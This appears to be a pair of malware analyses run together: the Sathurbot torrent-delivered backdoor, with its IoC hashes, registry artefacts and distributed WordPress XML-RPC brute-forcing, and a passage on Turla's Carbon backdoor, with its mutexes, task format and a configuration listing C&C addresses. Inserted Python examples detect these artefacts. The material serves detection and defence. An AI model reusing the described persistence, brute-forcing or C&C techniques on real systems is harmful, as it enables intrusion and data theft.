A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

Associated domains

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries vary across samples and have 6-character subkeys; their content is binary and encrypted, and is used to store variables, temporary values and settings, IPs, C&Cs and the UID.

For example, {GUID2} entries look like:

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001
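A way to hunt for the two registry artefacts above in a Regedit export (added example, not part of the ESET write-up): it parses the .reg text, decodes the FirewallRules value strings and flags inbound Allow rules for explorer.exe/rundll32.exe plus any ShellIconOverlayIdentifiers CLSID whose InprocServer32 points under ProgramData. The export, GUIDs and benign rows are constructed placeholders.

```python
"""Hunt the Sathurbot registry footprint in a Regedit (.reg) export.

Added example, not from the ESET write-up. Two artefact types from the page:
Windows Firewall rules stored under FirewallPolicy\FirewallRules as strings
"v2.10|Action=Allow|Active=TRUE|Dir=In|...|App=...|Name=...|" that allow inbound
traffic to explorer.exe and rundll32.exe (the processes the bot runs inside),
and a ShellIconOverlayIdentifiers entry whose CLSID's InprocServer32 points at
a DLL under ProgramData. SAMPLE_REG is constructed; GUIDs are placeholders.
"""
import re
from pathlib import PureWindowsPath

# .reg files double backslashes and escape quotes inside string values
_REG_LINE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<val>.*)$')

FW_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules"
OVERLAY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers"
CLSID_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID"
SUSPECT_APPS = {"explorer.exe", "rundll32.exe"}  # processes the page says Sathurbot lives in

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0F1E2D3C-0000-4000-8000-000000000001}"="v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|"
"{0F1E2D3C-0000-4000-8000-000000000002}"="v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|"
"CoreNet-ICMP6-DU-In"="v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=58|ICMP6=1:*|Name=Core Networking|"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll]
@="{0F1E2D3C-0000-4000-8000-0000000000AA}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SyncOverlay]
@="{0F1E2D3C-0000-4000-8000-0000000000BB}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F1E2D3C-0000-4000-8000-0000000000AA}\InprocServer32]
@="C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F1E2D3C-0000-4000-8000-0000000000BB}\InprocServer32]
@="C:\\Program Files\\SyncTool\\overlay.dll"
'''


def parse_reg(text):
    """Return {key_path: {value_name: string}} for REG_SZ values ('' is the default value)."""
    tree, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            tree.setdefault(key, {})
            continue
        m = _REG_LINE.match(line)
        if not m or key is None:
            continue
        val = m.group("val")
        if not (val.startswith('"') and val.endswith('"')):
            continue  # hex:/dword: values are not needed for these checks
        name = "" if m.group("default") else m.group("name")
        tree[key][name] = val[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return tree


def parse_fw_rule(rule):
    """'v2.10|Action=Allow|Dir=In|...|' -> (version, {field: [values]}); Profile may repeat."""
    parts = [p for p in rule.split("|") if p]
    fields = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        fields.setdefault(k, []).append(v)
    return parts[0], fields


def hunt(tree):
    """Return (kind, name, detail) findings for the two Sathurbot artefact types."""
    findings = []
    for name, rule in tree.get(FW_KEY, {}).items():
        _, f = parse_fw_rule(rule)
        app = PureWindowsPath(f.get("App", [""])[0]).name.lower()
        if f.get("Action") == ["Allow"] and f.get("Dir") == ["In"] and app in SUSPECT_APPS:
            findings.append(("firewall", name, app))
    for key, values in tree.items():
        if not key.startswith(OVERLAY_KEY + "\\"):
            continue
        clsid = values.get("")
        server = tree.get(f"{CLSID_KEY}\\{clsid}\\InprocServer32", {}).get("", "")
        if server.lower().startswith("c:\\programdata\\"):
            findings.append(("overlay", key.rsplit("\\", 1)[1], server))
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_reg(SAMPLE_REG)):
        print(finding)
```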

This article reveals the current ecosystem of the Sathurbot backdoor trojan, in particular its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent downloader

Want to download a movie or a piece of software without paying? There may be risks involved. It can easily happen that your favourite search engine returns torrent links on sites that have nothing to do with file sharing. They may, however, be running WordPress and have been compromised.

Some examples of search results:

Clicking those links returns pages like the following (note that some even use HTTPS):

All the movie subpages lead to the same torrent file, while all the software subpages lead to another torrent file. When you start torrenting in your favourite BitTorrent client, you will find the file is well seeded and thus appears legitimate. If you download the movie torrent, its content is a file with a video extension accompanied by an apparent codec pack installer and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. Both aim to get the victim to run the executable, which loads the Sathurbot DLL.

When you start the executable, you get a message like this:

While you are considering your options, bad things start happening in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

At startup, Sathurbot retrieves its C&C with a DNS query. The response is a DNS TXT record. Its string value is decrypted and used as the C&C domain name for status reporting, task retrieval and download links for other malware.

Sathurbot can update itself and download and start other executables. We have seen variants of Boaxxe, Kovter and Fleercivet, but this is not necessarily an exhaustive list.

Sathurbot then reports its successful installation, together with a listening port, to the C&C, and periodically reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5000-plus basic generic words. These are randomly combined to form 2-4 word phrases that are used as query strings for the Google, Bing and Yandex search engines.

From the web page at each resulting search URL, a random 2-4 word text chunk is selected (this time likely more meaningful, since it comes from real text) and used for the next round of search queries.

Finally, the domain names are harvested from the second set of search results (the third page).

The extracted domain names are subsequently probed to see whether they were created with the WordPress framework. The trick here is to check the response of the URL http://[domain_name]/wp-login.php

Subsequently, the domain's root page is fetched and checked for the presence of other frameworks. In other words, they are also interested in Drupal, Joomla, PHP-Nuke, phpFox and DedeCMS.

At startup, or at certain intervals, the harvested domains are sent to the C&C (a different domain than the hardcoded one used by the backdoor).

Distributed WordPress password attack

The client now gets a list of domain access credentials (in the format login:password@domain) to probe. Different bots in the Sathurbot botnet try different login credentials against the same site. Each bot tries just a single login per site and then moves on. This design helps ensure that the bot does not get its IP address blacklisted by any targeted site and can revisit it in the future.

In our testing, a list of 10,000 items to probe was returned by the C&C.

The attack itself uses the XML-RPC API of WordPress; in particular, the wp.getUsersBlogs API is abused. A typical request looks like:

Probing credentials for a number of domains is shown in the sequence below:

The responses are evaluated and the results posted to the C&C.

Torrent client and seeder

The bot has the libtorrent library integrated, and one of its tasks is to become a seeder: a binary file is downloaded, and a torrent is created and seeded.

BitTorrent bootstrap

Completing the cycle: from leech to involuntary seeder

Note: not every bot in the network performs all functions; some are just web crawlers, some only attack the XML-RPC API, and some do both. Also, not every bot appears to seed torrents.

Impact

The above-mentioned attempts at /wp-login.php from a multitude of users, even against sites that do not host WordPress, are a direct impact of Sathurbot. Many web admins observe this and wonder why it happens. In addition, WordPress sites can see potential attacks on wp.getUsersBlogs in their logs.

Judging by logs, system artefacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we see torrent links being sent by email as well.

Detection

Web admins – check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check the access logs for attacks and possible backdoors.

Users – run Wireshark with the filter http.request with no browser open and look for an excessive number of requests like GET /wp-login.php and/or POST /xmlrpc.php. Also, check for the files or registry entries listed in the IoC section below.

ESET users are protected from this threat on multiple levels.
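The server-side view of the detection advice above, as an added example that is not part of the original write-up: it scans access-log lines for the one-login-per-bot pattern on POST /xmlrpc.php (many distinct IPs, each with one or two requests in a short window) and for GET /wp-login.php answered 404 on a host that does not run WordPress. The log lines and thresholds are constructed.

```python
"""Spot Sathurbot-style distributed WordPress credential probing in access logs.

Added example, not code from the ESET write-up. The page states that each bot
tries a single login per site (POST /xmlrpc.php, wp.getUsersBlogs) and then
moves on, and that /wp-login.php gets probed even on hosts that do not run
WordPress. The server-side signal is therefore many distinct client IPs each
making one or two requests to these paths inside a short window, rather than
one IP hammering. Log lines and thresholds below are constructed.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache/nginx "combined" format: ip ident user [ts] "method path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
PROBE_PATHS = {"/xmlrpc.php", "/wp-login.php"}  # the two paths named on the page

# Constructed sample: a WordPress host seeing one-shot probes from six IPs.
WP_HOST_LOG = """\
198.51.100.7 - - [10/Apr/2017:09:00:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Apr/2017:09:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Apr/2017:09:00:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
203.0.113.12 - - [10/Apr/2017:09:00:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
203.0.113.13 - - [10/Apr/2017:09:00:15 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
203.0.113.14 - - [10/Apr/2017:09:00:22 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
203.0.113.15 - - [10/Apr/2017:09:00:31 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Apr/2017:09:02:00 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""
# Constructed sample: a plain PHP site (no WordPress) hit by the crawler's check.
PLAIN_HOST_LOG = """\
203.0.113.20 - - [10/Apr/2017:10:00:00 +0000] "GET /wp-login.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.21 - - [10/Apr/2017:10:00:30 +0000] "GET /wp-login.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Apr/2017:10:01:00 +0000] "GET /about.html HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict with ip, ts (datetime), method, path, status; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def analyze(log_text, window_sec=600, min_ips=5, max_per_ip=2):
    """Return findings for the two footprints the page describes.

    distributed: per probed path, the largest number of distinct IPs that each
      sent at most `max_per_ip` requests inside one `window_sec` window, reported
      only when it reaches `min_ips` (a single noisy IP does not trigger this).
    wp_login_404: GET /wp-login.php answered 404, i.e. the crawler's WordPress
      check against a host that does not serve WordPress at all.
    """
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    findings = {"distributed": {}, "wp_login_404": 0}
    by_path = defaultdict(list)
    for e in events:
        if e["path"] in PROBE_PATHS:
            by_path[e["path"]].append(e)
        if e["path"] == "/wp-login.php" and e["status"] == 404:
            findings["wp_login_404"] += 1
    for path, evs in by_path.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(evs)):
            # slide the window start forward until it spans at most window_sec
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_sec:
                start += 1
            per_ip = Counter(e["ip"] for e in evs[start:end + 1])
            low_rate = sum(1 for c in per_ip.values() if c <= max_per_ip)
            best = max(best, low_rate)
        if best >= min_ips:
            findings["distributed"][path] = best
    return findings


if __name__ == "__main__":
    print(analyze(WP_HOST_LOG))
    print(analyze(PLAIN_HOST_LOG))
```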

Removal

Web admins – change passwords, remove subpages that do not belong to the site, and optionally wipe the site and restore it from a backup.

Users – use a third-party file manager to find the suspect DLLs (note that the files and directories have the hidden attribute set), open a process manager or Task Manager, kill explorer.exe and/or rundll32.exe, delete (quarantine) the affected DLLs, and reboot.

Note: this removes Sathurbot only, and not any other malware it may also have downloaded.

Alternatively, consider a full-featured anti-malware product, or at least an online scanner.

Prevention

Web admins – if the site does not need the XML-RPC API for its normal operation, it is recommended to disable it. Also use complex passwords.

Users – avoid running executables downloaded from sources other than respected developers, and avoid downloading files from sites that are not designed primarily as file-sharing sites.

IoC

So far, we have observed Sathurbot installed as:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\ProtectHost.dll

It runs inside the rundll32.exe or explorer.exe process, locking and editing files and registry keys. It is currently installed in both 32-bit and 64-bit versions.

Subfolders of the above (containing the torrent seed files):
\securitycache\cache\summary\
\securitycache\cache\rules\
\securitycache\date\
\securitycache\zepplauncher.mif – contains the DHT nodes
\temp\

%APPDATA%\syshashtable\ directory – contains files representing hashes of the accessed domains
%APPDATA%\syshashtable\syshashinfo.db – collected interesting domains, including framework info

Carbon Paper: Peering into Turla’s second stage backdoor

The Turla espionage group has been targeting various institutions for many years. Recently, we found several new versions of Carbon, a second stage backdoor in the Turla group arsenal. Last year, a technical analysis of this component was made by Swiss GovCERT.ch as part of their report detailing the attack that a defense firm owned by the Swiss government, RUAG, suffered in the past.

This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.

Looking at the different version numbers of Carbon we have, it is clear that it is still under active development. Through the internal version numbers embedded in the code, we see that new versions are pushed out regularly. The group is also known to change its tools once they are exposed; accordingly, we have seen that between two major versions, mutexes and file names are changed.

Infection vectors

The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.

After a successful attack, a first stage backdoor — such as Tavdig[1] or Skipper[2] — is installed on the user's machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.

Technical analysis

Carbon is a sophisticated backdoor used to steal sensitive information from targets of interest by the Turla group.

This malware shares some similarities with “Uroburos”[3], a rootkit used by the same group. The most relevant resemblance is the communication framework. Indeed, both of them provide communication channels between different malware components. The communication objects are implemented in the same way, the structures and vtables look identical except that there are fewer communication channels provided in Carbon. Indeed, Carbon might be a “lite” version of Uroburos (without kernel components and without exploits).

For the Turla group to decide to install Carbon on a system, a (stage 1) reconnaissance tool is usually delivered to the target first: this tool collects several pieces of information about the victim's machine and its network (through Tavdig or Skipper, for example). If the target is considered interesting enough, it receives more sophisticated malware (such as Carbon or Uroburos).

Global architecture

The Carbon framework consists of:

  • a dropper that installs the carbon components and its configuration file
  • a component that communicates with the C&C
  • an orchestrator that handles the tasks, dispatches them to other computers on the network and injects into a legitimate process the DLL that communicates with the C&C
  • a loader that executes the orchestrator

Carbon Dating

The orchestrator and the injected library have their own development branch.

Thanks to the compilation dates and the internal version numbers hardcoded in the PE files, we can propose the following timeline:

Table 1 – Carbon development timeline

Carbon files

The files from the Carbon framework can have different names depending on the version but they all keep the same internal name (from the metadata) regardless of the version:

  • the dropper: “SERVICE.EXE”
  • the loader: “SERVICE.DLL” or “KmSvc.DLL”
  • the orchestrator: “MSIMGHLP.DLL”
  • the injected library: “MSXIML.DLL”

Each of these files exists in 32-bit and 64-bit versions.

Working directory

Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm[4].

A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding “WindowsApps”.

The filenames are hardcoded in the orchestrator. The same names are used in the 3.7x+ branch. Because the injected library accesses the same files as the orchestrator, it is another easy way to link a library version and an orchestrator.

Carbon 3.7x files tree view:
%carbon_working_folder%   // base folder
├── 0208                  // tasks results and logs files
│   └── C_56743.NLS       // contains list of files to send to the C&C server, this file is neither compressed nor encrypted
├── asmcerts.rs
├── getcerts.rs
├── miniport.dat          // configuration file
├── msximl.dll            // injected library (x32)
├── Nls                   // contains tasks (commands to be executed or PE file) and their configuration files
│   ├── a67ncodc.ax       // tasks to be executed by the orchestrator
│   └── b9s3coff.ax       // tasks to be executed by the injected library
├── System                // plugins folder
│   └── bootmisc.sdi      // not used
├── qavscr.dat            // error log
├── vndkrmn.dic           // log
└── ximarsh.dll           // injected library (x64)

Since version 3.80, all filenames have changed.

Carbon 3.8x files tree view:
%carbon_working_folder%   // base folder
├── 0409                  // contains tasks (commands to be executed or PE file) and their configuration files
│   ├── cifrado.xml       // tasks to be executed by the injected library
│   └── encodebase.inf    // tasks to be executed by the orchestrator
├── 1033                  // tasks results and logs files
│   └── dsntype.gif       // contains list of files to send to the C&C server, this file is neither compressed nor encrypted
├── en-US                 // plugins folder
│   └── asmlang.jpg       // not used
├── fsbootfail.dat        // error log
├── mkfieldsec.dll        // injected library (x32)
├── preinsta.jpg          // log
├── wkstrend.xml          // configuration file
├── xmlrts.png
└── zcerterror.png

File access

For the majority of the files in the Carbon working folder, when one is accessed by the malware, the following steps are taken:

  • a specific mutex is used to ensure its exclusive access.
  • the file is decrypted (CAST-128)
  • when the operations on the file are done, the file is reencrypted (CAST-128)
  • the mutex is released

Mutexes

The following mutexes are created by the orchestrator in Carbon 3.7x:

  • “Global\\MSCTF.Shared.MUTEX.ZRX” (used to ensure exclusive access to “vndkrmn.dic”)
  • “Global\\DBWindowsBase” (used to ensure exclusive access to “C_56743.NLS”)
  • “Global\\IEFrame.LockDefaultBrowser” (used to ensure exclusive access to “b9s3coff.ax”)
  • “Global\\WinSta0_DesktopSessionMut” (used to ensure exclusive access to “a67ncodc.ax”)
  • “Global\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}” (used to ensure exclusive access to new files created in “Nls” folder)
  • “Global\\SENS.LockStarterCacheResource” (used to ensure exclusive access to “miniport.dat”)
  • “Global\\ShimSharedMemoryLock” (used to ensure exclusive access to “asmcerts.rs”)

In Carbon 3.8x, the filenames and the mutex names have changed:

  • “Global\\Stack.Trace.Multi.TOS” (used to ensure exclusive access to “preinsta.jpg”)
  • “Global\\TrackFirleSystemIntegrity” (used to ensure exclusive access to “dsntype.gif”)
  • “Global\\BitswapNormalOps” (used to ensure exclusive access to “cifrado.xml”)
  • “Global\\VB_crypto_library_backend” (used to ensure exclusive access to “encodebase.inf”)
  • “Global\{E41B9AF4-B4E1-063B-7352-4AB6E8F355C7}” (used to ensure exclusive access to new files created in “0409” folder)
  • “Global\\Exchange.Properties.B” (used to ensure exclusive access to “wkstrend.xml”)
  • “Global\\DatabaseTransSecurityLock” (used to ensure exclusive access to “xmlrts.png”)

These mutexes are also used in the injected dll to ensure that the orchestrator has been executed.

Configuration File

The configuration file affects the malware’s behavior. The file format is similar to “inf” files used by Windows. It contains among others:

  • an “object_id”, a unique uuid used to identify the victim; when the value is not set in the file, it is generated randomly by the malware
  • a list of processes into which code is injected (iproc)
  • the frequency and time for task execution / backup logs / connection to the C&C ([TIME])
  • the IP addresses of other computers on the network ([CW_LOCAL])
  • the C&C server addresses ([CW_INET])
  • the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT])

This file might be updated later. Indeed, in the communication library, some cryptographic keys are used to encrypt/decrypt data and these keys are retrieved from a section [CRYPTO] in the configuration file that does not exist when the file is dropped from the loader resources.

Carbon 3.77 configuration file:
[NAME]
object_id=
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe
ex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe
[TIME]
user_winmin = 1800000
user_winmax = 3600000
sys_winmin = 3600000
sys_winmax = 3700000
task_min = 20000
task_max = 30000
checkmin = 60000
checkmax = 70000
logmin =  60000
logmax = 120000
lastconnect=111
timestop=
active_con = 900000
time2task=3600000
[CW_LOCAL]
quantity = 0
[CW_INET]
quantity = 3
address1 = doctorshand.org:80:/wp-content/about/
address2 = www.lasac.eu:80:/credit_payment/url/
address3 = www.shoppingexpert.it:80:/wp-content/gallery/
[TRANSPORT]
system_pipe = comnap
spstatus = yes
adaptable = no
[DHCP]
server = 135
[LOG]
logperiod = 7200
[WORKDATA]
run_task=
run_task_system=

Logfile

The Carbon framework includes a logfile that is used to log actions performed by the malware and information on the system that can be useful to the malware operator (for example if an analysis tool such as WireShark is running on the machine).

The log’s format has not changed since Carbon 3.71:

  • Date|Time|Object-Id|Source|Message

Example:
[LOG]
start=1
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK

This file is periodically backed up and sent to the C&C.

Dropper

The dropper is the only executable that is not a DLL. It is the first PE file to be executed: it is used to extract the other components from its resources.

The PE files that are used to load the main components are extracted into the Windows system directory while the orchestrator, the library used to communicate with the C&C and the configuration file are extracted into the Carbon working directory.

A new section is appended into a random “.inf” file from %SystemRoot%\INF. The section’s name is the volume serial disk number of the compromised machine and a value “root” is created with the chosen Carbon working directory.

Example:
[5049654F]
root="C:\Program Files\Windows Portable Devices"

Loader

This part of the component is used to load the orchestrator.

A service that ensures Carbon's persistence is created. Its name can be “srservice”, “ipvpn” or “hkmsvc” depending on the operating system version running on the compromised machine.

The Carbon working directory is retrieved by walking through the “%windir%\inf” folder and looking for the file that contains the Carbon base path.

Last but not least, the function “ModuleStart” (in Carbon 3.71) or “ModStart” (since Carbon 3.77) from the orchestrator (located in the Carbon base folder) is called.

Orchestrator

The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP.

Seven threads are created by the malware. It is easy to identify Carbon’s characteristics because each thread has a specific role:

Configuration fetching

Because the configuration file can be updated by the malware, some attributes like the C&C server addresses are monitored every 10 minutes.

Check Carbon storage folder periodically

There is a storage folder located in the Carbon working directory. This folder contains some files downloaded from the C&C server (tasks that are either commands to be executed or PE files, and their configuration files).

This thread runs continuously and checks every two hours[5] whether there is still enough space available in this folder; if not, a notification is written into the logfile.

Task execution

The execution of the tasks in the context of the orchestrator process is very similar to the way in which it is performed in the communication library (cf Communication library / Tasks execution).

The difference from the communication library is the file holding the task list: for the orchestrator it is “encodebase.inf” (Carbon v3.8x) or “a67ncodc.ax” (Carbon v3.7x).

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | [execution_mode | username | password]

The first five fields are required, while the last three are optional. If the field “execution_mode” is present, its value affects the way the task is executed:

  • 0 or 1: normal execution
  • 2: the task is executed in the security context of a specific user (credentials are provided through the username/password fields)
  • 3 or 4: the task is executed in the security context of the user represented by the “explorer.exe” token
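Parsers for the three plaintext formats described so far (the INF-style configuration, the task list lines above, and the logfile format), as an added example that is not ESET's or Turla's code; it assumes the files have already been CAST-128 decrypted. Config and log samples reuse values quoted on the page; the task paths are constructed.

```python
"""Parse the plaintext formats of Carbon's working-folder files.

Added example, not ESET's or Turla's code. Once the files are CAST-128
decrypted, three line formats from the analysis remain to triage: the
INF-style configuration ([SECTION] / key = value), the task list
(task_id | task_filepath | task_config_filepath | task_result_filepath |
task_log_filepath | [execution_mode | username | password]) and the log
(Date|Time|Object-Id|Source|Message). Config and log samples reuse values
quoted on the page; the task paths in SAMPLE_TASKS are constructed.
"""

EXECUTION_MODES = {  # execution_mode values as described on the page
    "0": "normal", "1": "normal",
    "2": "as configured user", "3": "explorer.exe token",
    "4": "explorer.exe token",
}
TASK_FIELDS = ["task_id", "task_filepath", "task_config_filepath",
               "task_result_filepath", "task_log_filepath",
               "execution_mode", "username", "password"]


def parse_inf(text):
    """[SECTION] headers and 'key = value' lines; whitespace around '=' is optional."""
    cfg, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line[0] == "[" and line[-1] == "]":
            section = line[1:-1]
            cfg.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            cfg[section][key.strip()] = value.strip()
    return cfg


def cnc_servers(cfg):
    """[CW_INET] addressN = host:port:path -> [(host, port, path), ...]."""
    inet = cfg.get("CW_INET", {})
    servers = []
    for n in range(1, int(inet.get("quantity", 0)) + 1):
        host, port, path = inet[f"address{n}"].split(":", 2)
        servers.append((host, int(port), path))
    return servers


def parse_task_line(line):
    """Five fields are required, the last three optional; mode 2 needs credentials."""
    fields = [f.strip() for f in line.split("|")]
    if not 5 <= len(fields) <= 8:
        raise ValueError(f"expected 5 to 8 fields, got {len(fields)}")
    task = dict(zip(TASK_FIELDS, fields))
    mode = task.get("execution_mode", "0")
    if mode not in EXECUTION_MODES:
        raise ValueError(f"unknown execution_mode {mode!r}")
    if mode == "2" and not (task.get("username") and task.get("password")):
        raise ValueError("execution_mode 2 needs username and password")
    task["execution"] = EXECUTION_MODES[mode]
    return task


def parse_log_line(line):
    """Date|Time|Object-Id|Source|Message; the message may itself contain '|'."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    rec = dict(zip(["date", "time", "object_id", "source", "message"], parts))
    rec["message"] = rec["message"].rstrip("|")
    return rec


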